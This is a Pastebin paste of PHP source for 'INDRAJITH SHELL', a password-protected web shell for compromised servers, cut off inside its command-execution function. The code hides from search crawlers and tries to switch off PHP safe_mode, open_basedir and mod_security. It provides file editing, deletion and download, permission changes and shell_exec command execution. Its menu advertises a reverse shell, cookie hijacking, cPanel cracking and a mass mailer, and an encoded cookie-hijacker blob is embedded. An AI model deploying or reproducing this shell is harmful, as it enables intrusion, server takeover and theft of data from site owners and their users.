EsenwCREW

EsnewCREW

Apr 26th, 2018
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 65.85 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4.  * originally scripted by AJITH KP and VISHNUNATH KP
  5. */
  6.  
  7. /*------------------ LOGIN -------------------*/
  8.  
  9. $usernameame="ajithkp560";
  10. $password="ajithkp560";
  11. $email="ajithkp560@gmail.com";
  12.  
  13.  
  14. /*------------------ Login Data End ----------*/
  15.  
  16. @error_reporting(5);
  17.  
  18. /*------------------ Anti Crawler ------------*/
  19. if(!empty($_SERVER['HTTP_USER_AGENT']))
  20. {
  21.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  22.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
  23.     {
  24.         header('HTTP/1.0 404 Not Found');
  25.         exit;
  26.     }
  27. }
  28. /*------------------ End of Anti Crawler -----*/
  29.  
  30.  
  31.  
  32.     echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
  33.     echo "<style>
  34.    html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
  35.    #loginbox { font-size:11px; color:green; width:1000px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  36.    input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
  37.    loginbox td { border-radius:5px; font-size:11px; }
  38.    .header { size:25px; color:green; }
  39.    h1 { font-family:DigifaceWide; color:green; font-size:200%; }
  40.    h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
  41.    .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
  42.    .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
  43.    hr { border:1px solid #222222; }
  44.    #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
  45.    #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
  46.    #meunlist li { margin: 0px; padding: 0px; display: inline; }
  47.    #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
  48.    #meunlist a:hover { background: #222; color:green; border-left:1px solid green; border-right:1px solid green; }
  49.    .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0;  }
  50.    .menu { font-size:25px; color: }
  51.    .textarea_edit { background-color:#111111; border:1px groove #333; color:#999; color:green; }
  52.    .textarea_edit:onfocus { text-decoration:none; border:1px solid green; }
  53.    .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
  54.    #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
  55.    .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
  56.    .table a{ text-decoration:none; color:green; font-size:15px; }
  57.    .table a:hover{text-decoration:underline;}
  58.    .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
  59.    .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
  60.    .table tr:hover{ background:#181818; }
  61.    .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center;  }
  62.    .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
  63.    .tbl a:hover{text-decoration:underline;}
  64.    .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px;  vertical-align:middle; width: 300px; }
  65.    .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
  66.    .tbl td:hover{ background:#181818; }
  67.    #alert {position: relative;}
  68.    #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
  69.    #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
  70.    #alert:target {display: none;}
  71.    .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  72.    .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  73.    @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
  74.    </style>";
  75.     if($_COOKIE["user"] != $usernameame && $_COOKIE["pass"] != md5($password))
  76.     {
  77.         if($_POST["usrname"]==$usernameame && $_POST["passwrd"]==$password)
  78.         {
  79.             print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
  80.         }
  81.         else
  82.         {
  83.             if($_POST['usrname'])
  84.             {
  85.                 print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
  86.             }
  87.             echo '<title>INDRAJITH SHELL</title><center>
  88.            <div id=loginbox><p><font face="verdana,arial" size=-1>
  89.            <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
  90.            <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  91.            <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL</b></font></th></tr>
  92.            <tr><td bgcolor="black" style="padding:5">
  93.            <form method="post">
  94.            <input type="hidden" name="action" value="login">
  95.            <input type="hidden" name="hide" value="">
  96.            <center><table>
  97.            <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  98.            <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  99.            <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
  100.            </div><br /></center>';
  101.             exit;
  102.         }
  103.     }
  104.  
  105.  
  106. $color_g="green";
  107. $color_b="4C83AF";
  108. $color_bg="#111111";
  109. $color_hr="#222";
  110. $color_wri="green";
  111. $color_rea="yellow";
  112. $color_non="red";
  113. $path=$_GET['path'];
  114.  
  115. @session_start();
  116. //@error_reporting(5);
  117. @set_time_limit(0);
  118. @ini_restore("safe_mode_include_dir");
  119. @ini_restore("safe_mode_exec_dir");
  120. @ini_restore("disable_functions");
  121. @ini_restore("allow_url_fopen");
  122. @ini_restore("safe_mode");
  123. @ini_restore("open_basedir");
  124.  
  125. $sep="/";
  126. if(strtolower(substr(PHP_OS,0,3))=="win")
  127. {
  128.     $os="win";
  129.     $sep="\\";
  130.     $ox="Windows";
  131. }
  132. else
  133. {
  134.     $os="nix";
  135.     $ox="Linux";
  136. }
  137.  
  138.  
  139.  
  140. $self=$_SERVER['PHP_SELF'];
  141. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  142. $your_ip=$_SERVER['REMOTE_ADDR'];
  143. $srvr_ip=$_SERVER['SERVER_ADDR'];
  144. $admin=$_SERVER['SERVER_ADMIN'];
  145.  
  146. $s_php_ini="safe_mode=OFF
  147. disable_functions=NONE";
  148.  
  149. $ini_php="<?
  150. echo ini_get(\"safe_mode\");
  151. echo ini_get(\"open_basedir\");
  152. include(\$_GET[\"file\"]);
  153. ini_restore(\"safe_mode\");
  154. ini_restore(\"open_basedir\");
  155. echo ini_get(\"safe_mode\");
  156. echo ini_get(\"open_basedir\");
  157. include(\$_GET[\"ss\"]);
  158. ?>";
  159.  
  160. $s_htaccess="<IfModule mod_security.c>
  161. Sec------Engine Off
  162. Sec------ScanPOST Off
  163. </IfModule>";
  164.  
  165. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
  166. AddType application/x-httpd-cgi .sh
  167. AddHandler cgi-script .pl
  168. AddHandler cgi-script .pl";
  169.  
  170. $sym_htaccess="Options all
  171. DirectoryIndex Sux.html
  172. AddType text/plain .php
  173. AddHandler server-parsed .php
  174. AddType text/plain .html
  175. AddHandler txt .html
  176. Require None
  177. Satisfy Any";
  178.  
  179. $sym_php_ini="safe_mode=OFF
  180. disable_functions=NONE";
  181.  
  182. $forbid_dir="Options -Indexes";
  183.  
  184. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  185.  
  186. /*----------------------- Top Menu ------------------------------------------*/
  187.  
  188. if($safemode=="On")
  189. {
  190.     echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
  191. }
  192. else
  193. {
  194.     echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
  195. }
  196.  
  197. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  198.  
  199. echo "<title>INDRAJITH SHELL</title><div id=result>
  200. <table>
  201.    <tbody>
  202.        <tr>
  203.            <td style='border-right:1px solid #104E8B;' width=\"300px;\">
  204.            <div style='text-align:center;'>
  205.                <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
  206.            </div>
  207.            </td>
  208.            <td>
  209.            <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
  210.            ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
  211.            Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
  212.            MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
  213.             echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
  214.             echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
  215.             echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
  216.             echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
  217.             echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
  218.             echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
  219.             echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
  220.            <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
  221.             if($os == 'win'){ echo  "Drives <font color=\"#666\" > : </font>";echo  drivesx(); }
  222.             echo "
  223.            </div>
  224.            </td>
  225.        </tr>
  226.    </tbody>
  227. </table></div>";
  228. echo "<div class='menubar'> <div id=\"meunlist\">
  229. <ul>
  230. <li><a href=\"?\">HOME</a></li>
  231. <li><a href=\"?symlink\">SymLink</a></li>
  232. <li><a href=\"?rs\">Reverse Shell</a></li>
  233. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
  234. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
  235. <li><a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a></li>
  236. <li><a href=\"?path={$path}&amp;forbd_dir\">Directory Listing Forbidden</a></li>
  237. </ul>
  238. <ul>
  239. <li><a href=\"?massmailer\">Mass Mailer</a></li>
  240. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
  241. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
  242. <li><a href=\"?remote_server_scan\">Remote Server Scanner</a></li>
  243. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
  244. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
  245. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
  246. <li><a href=\"?about_us\">About us</a></li>
  247. </ul>
  248. </div></div>";
  249. /*----------------------- End of Top Menu -----------------------------------*/
  250.  
  251.  
  252. /*--------------- FUNCTIONS ----------------*/
  253. function alert($alert_txt)
  254. {
  255.     echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
  256. }
  257.  
  258. function disabled_functns()
  259. {
  260.     if(!@ini_get('disable_functions'))
  261.     {
  262.         echo "None";
  263.     }
  264.     else
  265.     {
  266.     echo @ini_get('disable_functions');
  267.     }
  268. }
  269.  
  270.  
  271. function drivesx()
  272. {
  273.     foreach(range('A','Z') as $drive)
  274.     {
  275.         if(is_dir($drive.':\\'))
  276.         {
  277.             echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
  278.         }
  279.     }
  280. }
  281.  
  282. function filesizex($size)
  283. {
  284.     if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  285.     elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  286.     elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  287.     else $size .= " B";
  288.     return $size;
  289. }
  290.  
  291. function disc_size()
  292. {
  293.     echo filesizex(disk_total_space("/"));
  294. }
  295.  
  296. function freesize()
  297. {
  298.     echo filesizex(disk_free_space("/"));
  299. }
  300.  
  301. function file_perm($filz){
  302.     if($m=fileperms($filz)){
  303.         $p='';
  304.         $p .= ($m & 00400) ? 'r' : '-';
  305.         $p .= ($m & 00200) ? 'w' : '-';
  306.         $p .= ($m & 00100) ? 'x' : '-';
  307.         $p .= ($m & 00040) ? 'r' : '-';
  308.         $p .= ($m & 00020) ? 'w' : '-';
  309.         $p .= ($m & 00010) ? 'x' : '-';
  310.         $p .= ($m & 00004) ? 'r' : '-';
  311.         $p .= ($m & 00002) ? 'w' : '-';
  312.         $p .= ($m & 00001) ? 'x' : '-';
  313.         return $p;
  314.     }
  315.     else return "?????";
  316. }
  317.  
  318.  
  319. function mysqlx()
  320. {
  321.     if(function_exists('mysql_connect'))
  322.     {
  323.         echo "<font color='red'>Enabled</font>";
  324.     }
  325.     else
  326.     {
  327.         echo "<font color='green'>Disabled</font>";
  328.     }  
  329. }
  330.  
  331. function oraclesx()
  332. {
  333.     if(function_exists('oci_connect'))
  334.     {
  335.         echo "<font color='red'>Enabled</font>";
  336.     }
  337.     else
  338.     {
  339.         echo "<font color='green'>Disabled</font>";
  340.     }
  341. }
  342.  
  343. function mssqlx()
  344. {
  345.     if(function_exists('mssql_connect'))
  346.     {
  347.         echo "<font color='red'>Enabled</font>";
  348.     }
  349.     else
  350.     {
  351.         echo "<font color='green'>Disabled</font>";
  352.     }  
  353. }
  354.  
  355. function postgreyx()
  356. {
  357.     if(function_exists('pg_connect'))
  358.     {
  359.         echo "<font color='red'>Enabled</font>";
  360.     }
  361.     else
  362.     {
  363.         echo "<font color='green'>Disabled</font>";
  364.     }
  365. }
  366.  
  367. function curlx()
  368. {
  369.     if(function_exists('curl_version'))
  370.     {
  371.         echo "<font color='red'>Enabled</font>";
  372.     }
  373.     else
  374.     {
  375.         echo "<font color='green'>Disabled</font>";
  376.     }
  377. }
  378.  
  379. function filesize_x($filex)
  380. {
  381.     $f_size=filesizex(filesize($filex));
  382.     return $f_size;
  383. }
  384.  
  385. function rename_ui()
  386. {
  387.     $rf_path=$_GET['rename'];
  388.     echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value='   >>>   ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
  389. }
  390.  
  391. function filemanager_bg()
  392. {
  393.     global $sep, $self;
  394.     $path=!empty($_GET['path'])?$_GET['path']:getcwd();
  395.     $dirs=array();
  396.     $fils=array();
  397.     if(is_dir($path))
  398.     {
  399.         chdir($path);
  400.         if($handle=opendir($path))
  401.         {
  402.             while(($item=readdir($handle))!==FALSE)
  403.             {
  404.                 if($item=="."){continue;}
  405.                 if($item==".."){continue;}
  406.                 if(is_dir($item))
  407.                 {
  408.                     array_push($dirs, $path.$sep.$item);
  409.                 }
  410.                 else
  411.                 {
  412.                     array_push($fils, $path.$sep.$item);
  413.                 }
  414.             }
  415.         }
  416.         else
  417.         {
  418.             alert("Access Denied for this operation");
  419.         }
  420.     }
  421.     else
  422.     {
  423.         alert("Directory Not Found!!!");
  424.     }
  425.     echo "<div id=result><table class=table>
  426.    <tr>
  427.    <th width='500px'>Name</th>
  428.    <th width='100px'>Size</th>
  429.    <th width='100px'>Permissions</th>
  430.    <th width='500px'>Actions</th>
  431.    </tr>";
  432.     foreach($dirs as $dir)
  433.     {//chdir(isset($_GET['path']))
  434.         echo "<tr><td><a href={$self}?path={$dir}>".basename($dir)."</a></td>
  435.              <td>".filesize_x($dir)."</td>
  436.              <td><a href={$self}?path={$path}&amp;perm={$dir}>".file_perm($dir)."</a></td>
  437.              <td><a href={$self}?path={$path}&amp;del_dir={$dir}>Delete</a> | <a href={$self}?path={$path}&amp;rename={$dir}>Rename</a></td></tr>";
  438.     }
  439.     foreach($fils as $fil)
  440.     {
  441.         echo "<tr><td><a href={$self}?path={$path}&amp;read={$fil}>".basename($fil)."</a></td>
  442.              <td>".filesize_x($fil)."</td>
  443.              <td><a href={$self}?path={$path}&amp;perm={$fil}>".file_perm($fil)."</a></td>
  444.              <td><a href={$self}?path={$path}&amp;del_fil={$fil}>Delete</a> | <a href={$self}?path={$path}&amp;rename={$fil}>Rename</a> | <a href={$self}?path={$path}&amp;edit={$fil}>Edit</a> | <a href={$self}?path={$path}&amp;down={$fil}>Download</a> | <a href={$self}?path={$path}&amp;copy={$fil}>Copy</a>  </td>";
  445.     }
  446.     echo "</tr></table></div>";
  447. }
  448.  
  449. function rename_bg()
  450. {
  451.     if(isset($_GET['old_name']) && isset($_GET['new_name']))
  452.     {
  453.         $o_r_path=basename($_GET['old_name']);
  454.         $r_path=str_replace($o_r_path, "", $_GET['old_name']);
  455.         $r_new_name=$r_path.$_GET['new_name'];
  456.         echo $r_new_name;
  457.         if(rename($_GET['old_name'], $r_new_name)==FALSE)
  458.         {
  459.             alert("Access Denied for this action!!!");
  460.         }
  461.         else
  462.         {
  463.             alert("Renamed File Succeessfully");
  464.         }
  465.     }
  466. }
  467.  
  468. function edit_file()
  469. {
  470.     $path=$_GET['path'];
  471.     chdir($path);
  472.     $edt_file=$_GET['edit'];
  473.     $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  474.     if($e_content)
  475.     {
  476.         $o_content=$e_content;
  477.     }
  478.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  479.     {
  480.         $fd = fopen($edt_file, "rb");
  481.     if(!$fd)
  482.         {
  483.             alert("Permission Denied");
  484.         }
  485.     else
  486.         {
  487.             while(!feof($fd))
  488.             {
  489.                 $o_content=wordwrap(htmlspecialchars(fgets($fd)));
  490.             }
  491.         }
  492.         fclose($fd);
  493.     }
  494.     echo "<div id='result'><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>".  basename($_GET['edit'])  ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
  495.          <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
  496.          <input class='input_big' name='save' type='submit' value='   Save   ' /></div>";
  497. }
  498. function edit_file_bg()
  499. {
  500.     if(file_exists($_POST['e_file']))
  501.     {
  502.         $handle = fopen($_POST['e_file'],"w+");
  503.     if (!handle)
  504.         {
  505.             alert("Permission Denied");
  506.         }
  507.     else
  508.         {
  509.             fwrite($handle,$_POST['e_content_n']);
  510.             alert("Your changes were Successfully Saved!");
  511.         }
  512.         fclose($handle);
  513.     }
  514.     else
  515.     {
  516.         alert("File Not Found!!!");
  517.     }
  518. }
  519. function delete_file()
  520. {
  521.     $del_file=$_GET['del_fil'];
  522.     if(unlink($del_file) != FALSE)
  523.     {
  524.         alert("Deleted Successfully");
  525.         exit;
  526.     }
  527.     else
  528.     {
  529.         alert("Access Denied for this Operation");
  530.         exit;
  531.     }
  532. }
  533. function deldirs($d_dir)
  534. {
  535.     $d_files= glob($d_dir.'*', GLOB_MARK);
  536.     foreach($d_files as $d_file)
  537.     {
  538.         if(is_dir($d_file))
  539.         {
  540.             deldirs($d_file);
  541.         }
  542.         else
  543.         {
  544.             unlink($d_file);
  545.         }
  546.     }
  547.     if(is_dir($d_dir))
  548.     {
  549.         if(rmdir($d_dir))
  550.         {
  551.             alert("Deleted Directory Successfully");
  552.         }
  553.         else
  554.         {
  555.             alert("Access Denied for this Operation");
  556.         }
  557.     }
  558. }
  559. function download()
  560. {
  561.     $d_file=$_GET['down'];
  562.     $d_name=basename($d_file);
  563.     if (file_exists($d_file))
  564.     {
  565.         header('Content-Description: File Transfer');
  566.         header('Content-Type: application/octet-stream');
  567.         header('Content-Disposition: attachment; filename='. basename($d_file));
  568.         header('Content-Transfer-Encoding: binary');
  569.         header('Expires: 0');
  570.         header('Cache-Control: must-revalidate');
  571.         header('Pragma: public');
  572.         header('Content-Length: ' . filesize($d_file));
  573.         ob_clean();
  574.        
  575.         readfile($d_file);
  576.         exit;
  577.     }
  578. }
  579. function code_viewer()
  580. {
  581.     $path=$_GET['path'];
  582.     $r_file=$_GET['read'];
  583.     $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  584.     if($r_content)
  585.     {
  586.         $rr_content=$r_content;
  587.     }
  588.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  589.     {
  590.         $fd = fopen($r_file, "rb");
  591.     if (!$fd)
  592.         {
  593.             alert("Permission Denied");
  594.         }
  595.     else
  596.         {
  597.             while(!feof($fd))
  598.             {
  599.                 $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
  600.             }
  601.         }
  602.         fclose($fd);
  603.     }
  604.     echo "<div id=result><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&amp;edit=".$_GET['read']."'>".  basename($_GET['read'])  ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre></div>";
  605. }
  606. function copy_file_ui()
  607. {
  608.     echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value='   >>   ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
  609. }
  610. function copy_file_bg()
  611. {
  612.     global $sep;
  613.     if(function_exists(copy))
  614.     {
  615.         if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
  616.         {
  617.             alert("Succeded");
  618.         }
  619.         else
  620.         {
  621.             alert("Access Denied");
  622.         }
  623.     }
  624. }
  625. function ch_perm_bg()
  626. {
  627.     if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
  628.     {
  629.         if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
  630.         {
  631.             alert("Succeded. Permission Changed!!!");
  632.         }
  633.         else
  634.         {
  635.             alert("Access Denied for This Operation");
  636.         }
  637.     }
  638. }
  639. function ch_perm_ui()
  640. {
  641.     $p_file=$_GET['perm'];
  642.     echo "<div id =result><center><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value='   >>   ' /></form></p></center></div>";
  643.     ch_perm_bg();
  644. }
  645. function mk_file_ui()
  646. {
  647.     chdir($_GET['path']);
  648.     echo "<div id=result><br /><br /><font color=red><form method='GET'>
  649.          <input type='hidden' name='path' value=".getcwd().">
  650.          New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
  651.          <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
  652.          <input class='input_big' type='submit' value='  Save  ' /></form></center></div>";
  653. }
  654. function mk_file_bg()
  655. {
  656.     chdir($_GET['path']);
  657.     $c_path=$_GET['path'];
  658.     $c_file=$_GET['new_f_name'];
  659.     $c_file_contents=$_GET['n_file_content'];
  660.     $handle=fopen($c_file, "w");
  661.     if(!$handle)
  662.     {
  663.         alert("Permission Denied");
  664.     }
  665.     else
  666.     {
  667.         fwrite($handle,$c_file_contents);
  668.         alert("Your changes were Successfully Saved!");
  669.     }
  670.     fclose($handle);
  671. }
  672. function create_dir()
  673. {
  674.     chdir($_GET['path']);
  675.     $new_dir=$_GET['new_dir'];
  676.     if(is_writable($_GET['path']))
  677.     {
  678.         mkdir($new_dir);
  679.         alert("Direcory Created Successfully");
  680.         exit;
  681.     }
  682.     else
  683.     {
  684.         alert("Access Denied for this Operation");
  685.         exit;
  686.     }
  687. }
  688. function cmd($cmd)
  689. {
  690.     chdir($_GET['path']);
  691.     $res="";
  692.     if($_GET['cmdexe'])
  693.     {
  694.         $cmd=$_GET['cmdexe'];
  695.     }
  696.     if(function_exists('shell_exec'))
  697.     {
  698.         $res=shell_exec($cmd);
  699.     }
